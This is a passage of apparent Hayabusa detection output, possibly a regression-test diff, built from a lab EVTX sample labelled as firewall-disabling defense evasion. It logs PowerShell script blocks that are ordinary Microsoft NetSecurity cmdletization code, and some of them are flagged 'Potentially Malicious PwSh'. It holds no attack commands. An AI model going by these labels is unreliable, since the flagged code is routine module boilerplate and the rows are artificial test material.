$__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contai",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') 
-contai",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and 
(@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', 
$__cmdletization_methodParameters,",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { 